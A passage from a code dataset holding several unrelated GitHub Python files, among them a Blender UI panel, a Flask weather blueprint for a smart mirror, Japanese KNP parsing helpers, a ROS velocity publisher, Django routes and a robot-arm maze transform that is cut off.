2)\n# G.add_edge(1, 5)\n# G.add_edge(2, \"BlackboxB\")\n# G.add_edge(\"BlackboxB\",8)\n# G.add_edge(8,7)\n# G.add_edge(5, \"BlackboxA\")\n# G.add_edge(\"BlackboxB\", 4)\n# G.add_edge(\"BlackboxA\", 4)\n# G.add_edge(4, 7)\n# G.add_edge(7, \"exit\")\n# G.add_edge(6, 5)\n#\n# all_black_box = [\"BlackboxA\", \"BlackboxB\"]\n# all_decomp = find_all_decomposition_full(all_black_box, G)\n# all_valid_decomp = get_all_valid_decomposition(all_decomp)\n# l = 1\n# best_decomposition, score = get_best_decomposition(all_valid_decomp, G, l=1)\n# print(\"\\n\", \"Best decomposition:\")\n# print(goodness_measure(G, best_decomposition, l))\n#\n# plot(G)\n# plt.show()\n\nground_truth_param = {1 : np.array([0.7, 1.1, -0.5]), 2: np.array([0.4, 0.5]),\n \"Blackbox3\":np.array([1.1, -0.5]), 4:np.array([1.1, -0.5]), \"Blackbox5\":np.array([0.7, -0.5]),\n \"Blackbox6\": np.array([0.7, 1.1]), 7: np.array([0.7, -0.5])}\ndef get_data(component : Model, input_range_lower, input_range_upper, ground_truth_param):\n # ground truth for training\n component = copy.deepcopy(component)\n component.set_params(ground_truth_param)\n\n X_local = torch.tensor(np.random.uniform(input_range_lower, input_range_upper, size=100))\n y_local = component.forward(X_local, noisy=True) # labeling effort of A\n\n return X_local, y_local\n\ndef get_data_tree(component : Model, input_range_lower, input_range_upper, ground_truth_param):\n # ground truth for training\n component = copy.deepcopy(component)\n component.set_params(ground_truth_param)\n\n X_local = torch.tensor(np.random.uniform(input_range_lower, input_range_upper, size=(2,100)))\n y_local = component.forward(X_local, noisy=True) # labeling effort of A\n\n return X_local, y_local\n\nDG = DirectedFunctionalGraph()\n\n# white box components\nDG.add_node(1, component=DifferentiablePolynomial())\nx,y = get_data(DG.nodes[1][\"component\"], 0, 5, np.array([0.7, 1.1, -0.5]))\nDG.nodes[1][\"component\"].attach_local_data(x,y)\n\nDG.add_node(2, component=ModelSinCos())\nx,y = get_data(DG.nodes[2][\"component\"], -3, 6, np.array([0.4, 0.5]))\nDG.nodes[2][\"component\"].attach_local_data(x,y)\n\nDG.add_node(4, component=ModelExponential())\nx,y = get_data(DG.nodes[4][\"component\"], 0, 5, np.array([1.1, -0.5]))\nDG.nodes[4][\"component\"].attach_local_data(x,y)\n\nDG.add_node(7, component=ModelSinCos())\nx,y = get_data(DG.nodes[7][\"component\"], 0, 5, np.array([0.7, -0.5]))\nDG.nodes[7][\"component\"].attach_local_data(x,y)\n\n# black box components\nDG.add_node(\"Blackbox3\", component=ModelWeightedSum())\nDG.nodes[\"Blackbox3\"][\"component\"].set_params(ground_truth_param[\"Blackbox3\"])\n\nDG.add_node(\"Blackbox5\", component=ModelWeightedSum())\nDG.nodes[\"Blackbox5\"][\"component\"].set_params(ground_truth_param[\"Blackbox5\"])\n\nDG.add_node(\"Blackbox6\", component=ModelWeightedSum())\nDG.nodes[\"Blackbox6\"][\"component\"].set_params(ground_truth_param[\"Blackbox6\"])\n\n# Test warning for multiple parents\nDG.add_edge((\"Blackbox6\",7),\"Blackbox3\")\nDG.add_edge((1,2),\"Blackbox3\")\n\nDG.add_edge((4,2),\"Blackbox5\")\n\n# Test warning for singular parents\nDG.add_edge(2,4)\nDG.add_edge(\"Blackbox3\",4)\nDG.add_edge((7,\"Blackbox5\"),\"Blackbox6\")\n\n# nx.draw_networkx(DG)\n# plt.show()\n\nX_end, y_end = get_end_to_end_data(DG, ground_truth_param)\nDG.system_x = X_end\nDG.system_y = y_end\n\n# grad descent\n# all_losses = show_system_loss_from_grad_descent(DG, ground_truth_param,plot=True)\n\n# vanilla BO\n# BO_graph(DG)\n\n# BO with local loss -> system loss\nbounds = torch.tensor([[0.75, 0.25,0.7,0.37],[100,0.75,30,0.5]])\nDG.fit_locally_partial()\nBO_graph_local_loss(DG, bounds)\n\n\n\n\n\n\n","repo_name":"chenzhiliang94/AutoAI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40812976561","text":"# tokenizing: work_tokenizing, sentence_tokenizing\n# corpora: body of text\n# lexicon: word and their means\n\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\ntext = '''Hi, this is Prashant who loves doing code for Full-Stack Development. I've completed my graduation\n from Staffordshire University, my concentration was Software Engineering !!'''\nprint(word_tokenize(text))\nprint(sent_tokenize(text))\n","repo_name":"prashantkt10/sentdex-nlp","sub_path":"lec-1.py","file_name":"lec-1.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30469832543","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# (C) 2017 MKB\n#\n# This program is free software; you can redistribute it and / or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110 - 1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n#\n\n\n# LOAD MODUL # \nimport bpy\nfrom bpy import *\nfrom bpy.props import *\nfrom .. icons.icons import load_icons\n\nimport addon_utils\n\n\ndef draw_spacing_ui(self, context, layout):\n tp = context.window_manager.tp_props_looptools \n tp_props = context.window_manager.tp_props_resurface \n \n icons = load_icons()\n\n col = layout.column(align=True)\n \n if not tp_props.display_spacing: \n \n box = col.box().column(1)\n \n row = box.row(1) \n row.prop(tp_props, \"display_spacing\", text=\"\", icon=\"TRIA_RIGHT\", emboss = False) \n row.label(\"Spacing\")\n\n button_align_space = icons.get(\"icon_align_space\") \n row.operator(\"mesh.tp_looptools_space\", text=\"\", icon_value=button_align_space.icon_id) \n \n button_align_distribute = icons.get(\"icon_align_distribute\") \n row.operator(\"mesh.vertex_distribute\",text=\"\", icon_value=button_align_distribute.icon_id) \n\n button_align_straigten = icons.get(\"icon_align_straigten\") \n row.operator(\"mesh.vertex_align\",text=\"\", icon_value=button_align_straigten.icon_id) \n\n\n else:\n \n box = col.box().column(1)\n \n row = box.row(1) \n row.prop(tp_props, \"display_spacing\", text=\"\", icon=\"TRIA_DOWN\", emboss = False) \n row.label(\"Spacing\") \n\n button_align_space = icons.get(\"icon_align_space\") \n row.operator(\"mesh.tp_looptools_space\", text=\"\", icon_value=button_align_space.icon_id) \n \n button_align_distribute = icons.get(\"icon_align_distribute\") \n row.operator(\"mesh.vertex_distribute\",text=\"\", icon_value=button_align_distribute.icon_id) \n\n button_align_straigten = icons.get(\"icon_align_straigten\") \n row.operator(\"mesh.vertex_align\",text=\"\", icon_value=button_align_straigten.icon_id) \n\n\n\n box = col.box().column(1)\n \n row = box.column(1)\n row.operator(\"mesh.hd_viewport_vertex_align\")\n \n box.separator() \n \n row = box.column(1) \n button_align_straigten = icons.get(\"icon_align_straigten\") \n row.operator(\"mesh.vertex_align\",text=\"Straighten\", icon_value=button_align_straigten.icon_id) \n\n button_align_distribute = icons.get(\"icon_align_distribute\") \n row.operator(\"mesh.vertex_distribute\",text=\"Distribute\", icon_value=button_align_distribute.icon_id) \n\n imdjs_tools_addon = \"IMDJS_mesh_tools\" \n state = addon_utils.check(imdjs_tools_addon)\n if not state[0]:\n pass\n else: \n button_align_radians = icons.get(\"icon_align_radians\") \n row.operator(\"mesh.round_selected_points\", text=\"Radians\")\n\n box.separator() \n \n row = box.row(1) \n # space - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_space = icons.get(\"icon_align_space\") \n if tp.display_space:\n split.prop(tp, \"display_space\", text=\"\", icon_value=button_align_space.icon_id)\n else:\n split.prop(tp, \"display_space\", text=\"\", icon_value=button_align_space.icon_id)\n \n split.operator(\"mesh.tp_looptools_space\", text=\"LoopTools Space\", icon='BLANK1')\n\n # space - settings\n if tp.display_space:\n box = col.box().column(1) \n \n row = box.column(1) \n row.prop(tp, \"space_interpolation\")\n row.prop(tp, \"space_input\")\n\n box.separator()\n\n col_move = box.column(align=True)\n row = col_move.row(align=True)\n if tp.space_lock_x:\n row.prop(tp, \"space_lock_x\", text = \"X\", icon='LOCKED')\n else:\n row.prop(tp, \"space_lock_x\", text = \"X\", icon='UNLOCKED')\n if tp.space_lock_y:\n row.prop(tp, \"space_lock_y\", text = \"Y\", icon='LOCKED')\n else:\n row.prop(tp, \"space_lock_y\", text = \"Y\", icon='UNLOCKED')\n if tp.space_lock_z:\n row.prop(tp, \"space_lock_z\", text = \"Z\", icon='LOCKED')\n else:\n row.prop(tp, \"space_lock_z\", text = \"Z\", icon='UNLOCKED')\n col_move.prop(tp, \"space_influence\")\n\n box.separator() \n box = layout.box().column(1) \n\n\n row = box.row(1) \n # curve - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_curve = icons.get(\"icon_align_curve\") \n if tp.display_curve:\n split.prop(tp, \"display_curve\", text=\"\", icon_value=button_align_curve.icon_id)\n else:\n split.prop(tp, \"display_curve\", text=\"\", icon_value=button_align_curve.icon_id)\n\n split.operator(\"mesh.tp_looptools_curve\", text=\"LoopTools Curve\", icon='BLANK1')\n\n # curve - settings\n if tp.display_curve:\n box = col.box().column(1) \n \n row = box.column(1) \n row.prop(tp, \"curve_interpolation\")\n row.prop(tp, \"curve_restriction\")\n row.prop(tp, \"curve_boundaries\")\n row.prop(tp, \"curve_regular\")\n \n box.separator()\n\n col_move = box.column(align=True)\n row = col_move.row(align=True)\n if tp.curve_lock_x:\n row.prop(tp, \"curve_lock_x\", text = \"X\", icon='LOCKED')\n else:\n row.prop(tp, \"curve_lock_x\", text = \"X\", icon='UNLOCKED')\n if tp.curve_lock_y:\n row.prop(tp, \"curve_lock_y\", text = \"Y\", icon='LOCKED')\n else:\n row.prop(tp, \"curve_lock_y\", text = \"Y\", icon='UNLOCKED')\n if tp.curve_lock_z:\n row.prop(tp, \"curve_lock_z\", text = \"Z\", icon='LOCKED')\n else:\n row.prop(tp, \"curve_lock_z\", text = \"Z\", icon='UNLOCKED')\n col_move.prop(tp, \"curve_influence\")\n\n box.separator() \n box = layout.box().column(1) \n\n\n row = box.row(1) \n # circle - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_circle = icons.get(\"icon_align_circle\") \n if tp.display_circle:\n split.prop(tp, \"display_circle\", text=\"\", icon_value=button_align_circle.icon_id)\n else:\n split.prop(tp, \"display_circle\", text=\"\", icon_value=button_align_circle.icon_id)\n\n split.operator(\"mesh.tp_looptools_circle\", text=\"LoopTools Circle\", icon='BLANK1')\n\n # circle - settings\n if tp.display_circle:\n box = col.box().column(1) \n \n row = box.column(1) \n row.prop(tp, \"circle_fit\")\n \n row.separator()\n\n row.prop(tp, \"circle_flatten\")\n \n row = box.row(align=True)\n row.prop(tp, \"circle_custom_radius\")\n \n row_right = row.row(align=True)\n row_right.active = tp.circle_custom_radius\n row_right.prop(tp, \"circle_radius\", text=\"\") \n box.prop(tp, \"circle_regular\")\n \n box.separator()\n\n col_move = box.column(align=True)\n row = col_move.row(align=True)\n if tp.circle_lock_x:\n row.prop(tp, \"circle_lock_x\", text = \"X\", icon='LOCKED')\n else:\n row.prop(tp, \"circle_lock_x\", text = \"X\", icon='UNLOCKED')\n if tp.circle_lock_y:\n row.prop(tp, \"circle_lock_y\", text = \"Y\", icon='LOCKED')\n else:\n row.prop(tp, \"circle_lock_y\", text = \"Y\", icon='UNLOCKED')\n if tp.circle_lock_z:\n row.prop(tp, \"circle_lock_z\", text = \"Z\", icon='LOCKED')\n else:\n row.prop(tp, \"circle_lock_z\", text = \"Z\", icon='UNLOCKED')\n col_move.prop(tp, \"circle_influence\")\n\n box.separator() \n box = layout.box().column(1) \n \n\n row = box.row(1) \n # flatten - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_flatten = icons.get(\"icon_align_flatten\") \n if tp.display_flatten:\n split.prop(tp, \"display_flatten\", text=\"\", icon_value=button_align_flatten.icon_id)\n else:\n split.prop(tp, \"display_flatten\", text=\"\", icon_value=button_align_flatten.icon_id)\n\n split.operator(\"mesh.tp_looptools_flatten\", text=\"LoopTool Flatten\", icon =\"BLANK1\")\n\n # flatten - settings\n if tp.display_flatten:\n box = col.box().column(1) \n \n row = box.column(1) \n row.prop(tp, \"flatten_plane\")\n\n box.separator()\n\n col_move = box.column(align=True)\n row = col_move.row(align=True)\n if tp.flatten_lock_x:\n row.prop(tp, \"flatten_lock_x\", text = \"X\", icon='LOCKED')\n else:\n row.prop(tp, \"flatten_lock_x\", text = \"X\", icon='UNLOCKED')\n if tp.flatten_lock_y:\n row.prop(tp, \"flatten_lock_y\", text = \"Y\", icon='LOCKED')\n else:\n row.prop(tp, \"flatten_lock_y\", text = \"Y\", icon='UNLOCKED')\n if tp.flatten_lock_z:\n row.prop(tp, \"flatten_lock_z\", text = \"Z\", icon='LOCKED')\n else:\n row.prop(tp, \"flatten_lock_z\", text = \"Z\", icon='UNLOCKED')\n col_move.prop(tp, \"flatten_influence\")\n\n box.separator() \n\n box.separator() \n \n row = box.row(1) \n button_align_planar = icons.get(\"icon_align_planar\") \n row.operator(\"mesh.face_make_planar\", \"Make Planar Faces\", icon_value=button_align_planar.icon_id) \n\n box.separator() \n\n\n ","repo_name":"mkbreuer/ToolPlus","sub_path":"2.79/Sets/toolplus_resurface/ui_layouts/ui_spacing.py","file_name":"ui_spacing.py","file_ext":"py","file_size_in_byte":11518,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"34"} +{"seq_id":"45310204643","text":"from sklearn.cluster import SpectralClustering\nimport pandas as pd\nimport networkx as nx\nfrom matplotlib.pylab import show, cm, axis\n\n\nedge_list_df = pd.read_csv(\"work/edgelists/joined/test_0.9.csv\", sep=\"\\t\")\n\nG = nx.from_pandas_edgelist(edge_list_df, \"term1\", \"term2\", edge_attr=True)\nadj_matrix = nx.adjacency_matrix(G, weight=None)\n\nspec_cl = SpectralClustering(\n 3,\n affinity='precomputed',\n n_init=100\n)\nspec_cl.fit(adj_matrix)\n\nnx.draw_networkx(\n G,\n node_color=spec_cl.labels_,\n node_size=50,\n with_labels=True,\n edge_color=\"silver\",\n cmap=cm.tab20)\n\naxis(\"off\")\n#plt.savefig(\"work/edgelists/plots/plot.png\")\nshow(block=False)\n","repo_name":"JoelAAs/phenotype_mapping","sub_path":"src/Clustering/SpectralClustering.py","file_name":"SpectralClustering.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26338078576","text":"import base64\nimport json\nfrom flask import Blueprint, render_template, request, jsonify\nfrom exts import mail\nfrom flask_mail import Message\nimport requests\n\nfrom models import IndoorClimate, OutdoorClimate, WeatherForecast\n\nbp = Blueprint(\"DisInformation\", __name__, url_prefix=\"/\")\nurl = ' http://xxxxxxxx'\nweather_req = 'yourAPIKey'\n\n\nclass Forecast:\n today = {}\n tomorrow = {}\n the_day_after = {}\n\n\n@bp.route(\"/\")\ndef index():\n indoor_env = IndoorClimate.query.filter_by(id=1).first()\n # 获取当前天气\n weather_base_url = weather_req + '&extensions=base'\n response_base = requests.get(weather_base_url)\n outdoor_base_msg = {}\n # 检查响应状态码\n if response_base.status_code == 200:\n # 解析JSON数据\n json_base_data = response_base.json()\n outdoor_base_msg = OutdoorClimate.from_json(json_base_data)\n else:\n # 请求失败,处理错误\n print('请求失败,response_base状态码:', response_base.status_code)\n # 获取预报天气\n weather_all_url = weather_req + '&extensions=all'\n response_all = requests.get(weather_all_url)\n forecast = Forecast()\n week_num = {'1': '一', '2': '二', '3': '三', '4': '四', '5': '五', '6': '六', '7': '日'}\n weather_events = {\n '晴': 'qingtian', '少云': 'shaoyun', '晴间多云': 'duoyunzhuanqing', '多云': 'duoyun', '阴': 'yintian',\n '有风': 'baitianyoufeng', '平静': 'pingjing', '微风': 'weifeng', '和风': 'weifeng', '清风': 'feng',\n '强风/劲风': 'qiangfeng', '疾风': 'qiangfeng', '大风': 'dafeng', '烈风': 'liefeng',\n '风暴': 'liefeng', '狂爆风': 'liefeng', '飓风': 'redaifengbao', '热带风暴': 'redaifengbao',\n '霾': 'mai', '中度霾': 'mai', '重度霾': 'mai', '严重霾': 'mai', '热': 're', '冷': 'leng',\n '阵雨': 'zhenyu', '雷阵雨': 'leizhenyu', '雷阵雨并伴有冰雹': 'bingbao',\n '小雨': 'xiaoyu', '中雨': 'zhongyu', '大雨': 'dayu', '暴雨': 'baoyu', '大暴雨': 'baoyu', '特大暴雨': 'baoyu',\n '强阵雨': 'qiangzhenyu', '强雷阵雨': 'qiangleizhenyu', '极端降雨': 'jiduanjiangyu', '毛毛雨/细雨': 'xiaoyu',\n '雨': 'xiaoyu',\n '小雨-中雨': 'zhongyu', '中雨-大雨': 'dayu', '大雨-暴雨': 'baoyu', '暴雨-大暴雨': 'baoyu',\n '大暴雨-特大暴雨': 'baoyu',\n '雨雪天气': 'yujiaxue', '雨夹雪': 'yujiaxue', '阵雨夹雪': 'yujiaxue', '冻雨': 'bingbao',\n '雪': 'xiaoxue', '阵雪': 'zhenxue', '小雪': 'xiaoxue', '中雪': 'zhongxue', '大雪': 'daxue', '暴雪': 'baoxue',\n '小雪-中雪': 'zhongxue', '中雪-大雪': 'daxue', '大雪-暴雪': 'baoxue',\n '浮尘': 'fuchen', '扬沙': 'baitianyangsha', '沙尘暴': 'shachenbao', '强沙尘暴': 'shachenbao_1',\n '龙卷风': 'longjuanfeng',\n '雾': 'youwu', '浓雾': 'youwu', '强浓雾': 'youwu', '轻雾': 'youwu', '大雾': 'youwu', '特强浓雾': 'youwu'\n }\n # 检查响应状态码\n if response_all.status_code == 200:\n # 解析JSON数据\n json_all_data = response_all.json()\n json_casts = json_all_data.get('forecasts')\n count = 0\n forecasts = [\"\", \"\", \"\"]\n original_forecasts = json_casts[0].get('casts')\n for i in range(len(original_forecasts)):\n print(i)\n if i == 3:\n break\n forecasts[i] = WeatherForecast.from_json(original_forecasts[i])\n for cast in json_casts[0].get('casts'):\n if count == 0:\n forecast.today = WeatherForecast.from_json(cast)\n forecast.today.week = week_num[forecast.today.week]\n count = 1\n elif count == 1:\n forecast.tomorrow = WeatherForecast.from_json(cast)\n forecast.tomorrow.week = week_num[forecast.tomorrow.week]\n count = 2\n elif count == 2:\n forecast.the_day_after = WeatherForecast.from_json(cast)\n forecast.the_day_after.week = week_num[forecast.the_day_after.week]\n count = 3\n else:\n break\n else:\n # 请求失败,处理错误\n print('请求失败,response_all状态码:', response_all.status_code)\n # return \"Success\"\n\n return render_template('index.html', indoor_env=indoor_env,\n weather_events=weather_events, outdoor_climate=outdoor_base_msg,\n forecasts=forecasts, week_num=week_num)\n\n\n@bp.route(\"/test\", methods=[\"POST\"])\ndef test():\n try:\n my_json = request.get_json()\n print(my_json)\n get_school = my_json.get(\"school\")\n get_name = my_json.get(\"name\")\n get_age = my_json.get(\"age\")\n mydata = {\"name\": get_name, \"age\": get_age, \"school\": get_school}\n response = requests.post(url=url, data=json.dumps(mydata))\n return \"response\"\n except Exception as e:\n print(e)\n return jsonify(msg=\"Wrong\")\n\n\n@bp.route(\"/test1\", methods=['POST'])\ndef the_test():\n with open(r'uploads/02b054679034407996be23ae2c556688.png', 'rb') as f:\n res = base64.b64encode(f.read())\n return res\n\n\n@bp.route(\"/mail/test\")\ndef mail_test():\n message = Message(subject=\"邮箱测试\", recipients=[\"177574296@qq.com\"], body=\"这是一条测试邮件\")\n mail.send(message)\n return \"邮件发送成功\"\n\n\n@bp.route(\"/test2\")\ndef bs_test():\n return render_template('test.html')\n","repo_name":"yinhanlin/smartmirror","sub_path":"blueprints/DisInformation.py","file_name":"DisInformation.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3809126833","text":"#!/usr/bin/env pythono3\n# -*- coding: utf-8 -*- \n\nfrom pyknp import KNP\n\n\"\"\"\nターゲット単語と評価語の構文解析結果を保存\n\nin:ターゲット単語のある文章,ターゲット単語,評価辞書(用語),評価辞書(名詞)\nout:構文解析結果の辞書\n\n\"\"\"\ndef save_bnst(text,keyword,pn_dic): \n\n bnst_dic ={} \n keyword_id = 0\n pn_id = []\n \n child_list=[]\n parent_list=[]\n\n # 1. 構文結果を保存 (1.親id辞書,2.単語id辞書)\n knp = KNP()\n result = knp.parse(text)\n \n for bnst in result.bnst_list():\n word = \"\"\n dic_value ={}\n\n # 1-1.単語の結合、評価極性語のidの調査 \n for mrph in bnst.mrph_list():\n \n # 1. ターゲット単語\n if mrph.midasi == keyword: \n keyword_id = bnst.bnst_id\n # 2. 評価辞書(用語・名詞)\n elif mrph.midasi in pn_dic:\n pn_id.append([bnst.bnst_id,pn_dic[mrph.midasi]])\n \n word += mrph.midasi\n\n # 1-2.辞書追加\n dic_value[\"parent_id\"] = bnst.parent_id\n dic_value[\"word\"]= word\n \n bnst_dic[bnst.bnst_id] = dic_value\n \n\n return bnst_dic,keyword_id,pn_id\n\n\n\"\"\"\n係り受け関係のid順を取得する\n\nin:構文解析結果の辞書 \nout:係り受け関係のid順\n\n\"\"\" \ndef get_bnst_order(bnst_dic):\n\n bnst_order_dic = {}\n\n # 1. 全ての文節の係り受け順(id)を取得する\n for my_id in bnst_dic.keys():\n\n flag = True\n my_list=[my_id]\n serch_id = my_id\n\n # 1-1. 文節ごとに、最後の係り先になるまでループする\n while flag:\n parent_id = bnst_dic[serch_id][\"parent_id\"]\n\n if parent_id != -1: # 係り先が最後じゃないとき、係り先のidを格納\n my_list.append(bnst_dic[serch_id][\"parent_id\"])\n \n else: # 係り先が最後のとき、ループを抜ける\n flag = False\n \n serch_id = parent_id # 1-2.係り先のidを次の探索idとする\n \n bnst_order_dic[my_id] = my_list # 1-3.文節ごとに、係り受け順を格納\n \n return bnst_order_dic\n\n\"\"\"\n最��の係り元idを取得する\n\nin:構文解析結果の辞書\nout:最後の係り元idを取得 \n\n\"\"\"\ndef get_bnst_end(bnst_dic):\n \n end_list = []\n\n # 1. 文節ごとに、他の文節の親になっているか調べる\n for my_id in bnst_dic.keys():\n\n # 1-1. 他の文節の親を調査\n for value in bnst_dic.values():\n \n if my_id == value[\"parent_id\"]: # 文節の親になっている場合、false\n flag = False\n break\n else: # 文節の親になっていない場合、true\n flag = True\n\n if flag:\n end_list.append(my_id) # リストに追加する\n \n return end_list\n\n\"\"\"\nターゲット単語の左側のidを取得する\n\nin:構文解析結果の辞書、係り受け関係のid順、ターゲットid\nout:ターゲット単語の左側のid (複数あり)\n\n\"\"\"\ndef get_bnst_left(bnst_dic,bnst_order_dic,keyword_id):\n \n bnst_left = []\n end_list = get_bnst_end(bnst_dic)\n\n # 1. 係り受けルートにターゲット単語あったとき、左側の単語を取得\n for i in end_list:\n serch_list = bnst_order_dic[i]\n\n # 1-2. 係り受けルートにターゲット単語があるか調べる\n if keyword_id in serch_list:\n p = serch_list.index(keyword_id) \n if p != 0:\n tmp_list = []\n \n # 1-3. ターゲット単語の左側の単語を取得\n for j in range(p):\n left_id = serch_list[j]\n tmp_list.append(left_id)\n\n #1-4. 取得したものをリストに格納\n bnst_left.append(tmp_list)\n \n return bnst_left\n\n\n\n\"\"\"\nターゲット単語の右側のidを取得する\n\nin:係り受け関係のid順、ターゲットid\nout:ターゲット単語の右側のid (1つのみ)\n\"\"\"\n\ndef get_bnst_right(bnst_order_dic,keyword_id):\n\n bnst_right = []\n # 1. 係り関係順を元に、ターゲットの右側単語を取得\n for right_id in bnst_order_dic[keyword_id]:\n if right_id != keyword_id:\n bnst_right.append(right_id)\n\n return bnst_right\n\n\n \n \n","repo_name":"aharenchie/review_alalysis","sub_path":"run_knp.py","file_name":"run_knp.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42674803701","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import String\nfrom kortex_driver.msg import Base_JointSpeeds, JointSpeed\nimport copy\n\n#trajectory following using joint velocities (not used)\ndef send_vel_commands():\n rospy.init_node('velocity_commander', anonymous=True)\n controller_name = '/my_gen3/in/joint_velocity'\n\n # trajectory_pub = rospy.Publisher(controller_name, FollowJointTrajectoryActionGoal, queue_size = 10)\n trajectory_pub = rospy.Publisher(controller_name, Base_JointSpeeds, queue_size = 10)\n\n jtp_speeds = Base_JointSpeeds()\n jtp_list = []\n print(\"Publishing trajectory execution\")\n\n # jtp_speeds = Base_JointSpeeds()\n while not rospy.is_shutdown():\n for j in range(7):\n jtp_speed = JointSpeed()\n jtp_speed.joint_identifier = j\n jtp_speed.value = 0\n jtp_speed.duration = 1\n jtp_speeds.joint_speeds.append(copy.copy(jtp_speed))\n\n print(jtp_speeds)\n trajectory_pub.publish(jtp_speeds)\n print(\"Executed trajectory\")\n\nif __name__ == '__main__':\n try:\n send_vel_commands()\n except rospy.ROSInterruptException:\n pass","repo_name":"hipsdontlie/ros_kortex","sub_path":"kortex_gazebo/scripts/send_vel_commands_topic.py","file_name":"send_vel_commands_topic.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"5381708818","text":"from django.urls import path, re_path\nfrom . import views\nfrom django.views.static import serve\nfrom JinroServer import settings\n\nurlpatterns = [\n path('hall/', views.hall_list),\n path('join/', views.join_game),\n path('start/', views.game_start),\n path(\"readyGame/\",views.ready_game),\n path('uploadIcon/', views.upload_icon),\n path('updateProfile/', views.update_profile),\n path('updateGameSetting/', views.update_game_setting),\n path('exile/', views.exile_player),\n path('doatngiht/', views.do_at_night),\n path(\"rooms/\", views.rooms),\n path(\"login/\", views.login),\n path('joinSakura/', views.join_sakura),\n path('kickPlayer/', views.kick_player),\n re_path(r'^media/(?P.*)$', serve, {'document_root': settings.MEDIA_ROOT}),\n\n]","repo_name":"qianiaoo/JinroServer","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36002016601","text":"'''swajith is having 1 lakh in his bank account in that rate of intrest is 12% per annum in the 5th month swajith is withdrawing\r\nrupees 25,000 in inorder to buy gift for his loved one in the ninth month 10,000 is been deposited in order to give for second\r\nloved one by end of the financial year,does how much swajith having in his bank account?'''\r\ntotal_amount=int(input(\"\"))\r\ni=int(input())\r\nm5=int(input())\r\nm9=int(input())\r\nintrest_upto_5months=(total_amount*4/12*i)/100\r\nintrest_upto_9months=(total_amount-m5*4/12*i)/100\r\nremaining_months=((total_amount-m5+m9)*4/12*i)/100\r\nprint((total_amount-m5+m9)+intrest_upto_5months+intrest_upto_9months+remaining_months)\r\n","repo_name":"sravani123456778/EZ-techinical-trainings","sub_path":"simpleIntrest.py","file_name":"simpleIntrest.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9224207035","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 17 13:55:07 2022\r\n\r\n@author: Dell\r\n\"\"\"\r\n\r\ni = 10\r\nl = []\r\np = []\r\nn = []\r\nodd = []\r\neven = []\r\nDict = {}\r\nwhile i > 1:\r\n num = int(input(\"Enter integer:\"))\r\n l.append(num) # make an original list with user inputted integers\r\n i -= 1\r\nfor j in l:\r\n if j >= 0: # adds to positive integers list\r\n p.append(j)\r\n if j < 0: # adds to negative integers list\r\n n.append(j)\r\n if j % 2 != 0: # adds to odd integers list\r\n odd.append(j)\r\n if j % 2 == 0: # adds to even integers list\r\n even.append(j)\r\n Dict[j] = l.count(j)\r\nprint(\"a) Positive integers:\", p)\r\nprint(\"b) Negative integers:\", n)\r\nprint(\"c) Odd integers:\", odd)\r\nprint(\"d) Even integers:\", even)\r\nprint('e)')\r\nfor k in Dict:\r\n print(f'integer:{k} ; number of times it occurs: {Dict[k]}')","repo_name":"savnijawalkar/assignment-5","sub_path":"untitled8.py","file_name":"untitled8.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15395860715","text":"\n# transform.py\n# ---------------\n# Licensing Information: You are free to use or extend this projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n#\n# Created by Jongdeog Lee (jlee700@illinois.edu) on 09/12/2018\n\n\"\"\"\nThis file contains the transform function that converts the robot arm map\nto the maze.\n\"\"\"\nimport copy\nfrom arm import Arm\nfrom maze import Maze\nfrom search import *\nfrom geometry import *\nfrom const import *\nfrom util import *\n\ndef transformToMaze(arm, goals, obstacles, window, granularity):\n \"\"\"This function transforms the given 2D map to the maze in MP1.\n\n Args:\n arm (Arm): arm instance\n goals (list): [(x, y, r)] of goals\n obstacles (list): [(x, y, r)] of obstacles\n window (tuple): (width, height) of the window\n granularity (int): unit of increasing/decreasing degree for angles\n\n Return:\n Maze: the maze instance generated based on input arguments.\n\n \"\"\"\n start_tmp = arm.getArmAngle() #alpha beta\n armLimit = arm.getArmLimit() #[(min,max), (min,max)]\n\n\n\n\n alpha_max = armLimit[0][1]\n alpha_min = armLimit[0][0]\n 